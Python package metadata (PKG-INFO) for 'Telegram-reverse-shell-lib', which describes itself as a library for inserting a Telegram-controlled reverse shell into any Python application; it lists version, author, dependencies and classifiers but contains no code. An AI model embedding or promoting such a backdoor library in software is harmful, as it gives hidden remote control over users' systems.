Metadata-Version: 2.1
Name: Telegram-reverse-shell-lib
Version: 0.1
Summary: A Python library for inserting an reverse shell attached to Telegram in any Python application.
Home-page: https://github.com/TorhamDev/telegram-reverse-shell-lib
Author: Torham
Author-email: torhamdev@gmail.com
License: gpl-3.0
Keywords: python reverse shell,generate reverse shell,telegram,telegram reverse shell,python reverse shell
Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)
Classifier: Programming Language :: Python :: 3.6
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Requires-Python: >=3.6.0
License-File: LICENSE
Requires-Dist: beautifulsoup4 (==4.11.1)
Requires-Dist: bs4 (==0.0.1)
Requires-Dist: psutil (==5.9.2)
Requires-Dist: requests (==2.28.1)
